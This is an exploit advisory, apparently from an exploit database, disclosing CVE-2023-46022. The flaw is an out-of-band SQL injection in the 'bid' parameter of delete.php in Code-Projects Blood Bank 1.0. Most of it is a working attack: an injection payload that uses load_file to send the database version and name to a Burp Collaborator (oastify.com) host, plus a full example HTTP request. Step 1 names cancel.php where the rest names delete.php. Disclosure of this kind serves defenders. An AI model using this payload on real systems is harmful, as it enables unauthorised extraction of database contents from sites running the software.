Blood Bank version 1.0 suffers from suffers from a remote SQL injection vulnerability. Original discovery of SQL injection in this version is attributed to Nitin Sharma in October of 2021.
advisories | CVE-2023-46022
# Exploit Title: Blood Bank 1.0 - 'bid' SQLi
# Date: 2023-11-15
# Exploit Author: Ersin Erenler
# Vendor Homepage: https://code-projects.org/blood-bank-in-php-with-source-code
# Software Link: https://download-media.code-projects.org/2020/11/Blood_Bank_In_PHP_With_Source_code.zip
# Version: 1.0
# Tested on: Windows/Linux, Apache 2.4.54, PHP 8.2.0
# CVE : CVE-2023-46022
-------------------------------------------------------------------------------
# Description:
The 'bid' parameter in the /delete.php file of Code-Projects Blood Bank V1.0 is susceptible to Out-of-Band SQL Injection. This vulnerability stems from inadequate protection mechanisms, allowing attackers to exploit the parameter using Burp Collaborator to initiate OOB SQL injection attacks. Through this technique, an attacker can potentially extract sensitive information from the databases.
Vulnerable File: /delete.php
Parameter Name: bid
# Proof of Concept:
----------------------
1. Intercept the request to cancel.php via Burp Suite
2. Inject the payload to the vulnerable parameters
3. Payload: 3'%2b(select%20load_file(concat('\',version(),'.',database(),'.collaborator-domaina.txt')))%2b'
4. Example request for bid parameter:
---
GET /bloodbank/file/delete.php?bid=3'%2b(select%20load_file(concat('\',version(),'.',database(),'.domain.oastify.coma.txt')))%2b' HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: close
Referer: http://localhost/bloodbank/bloodinfo.php
Cookie: PHPSESSID=<some-cookie-value>
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
---
5. Database and version information is seized via Burp Suite Collaborator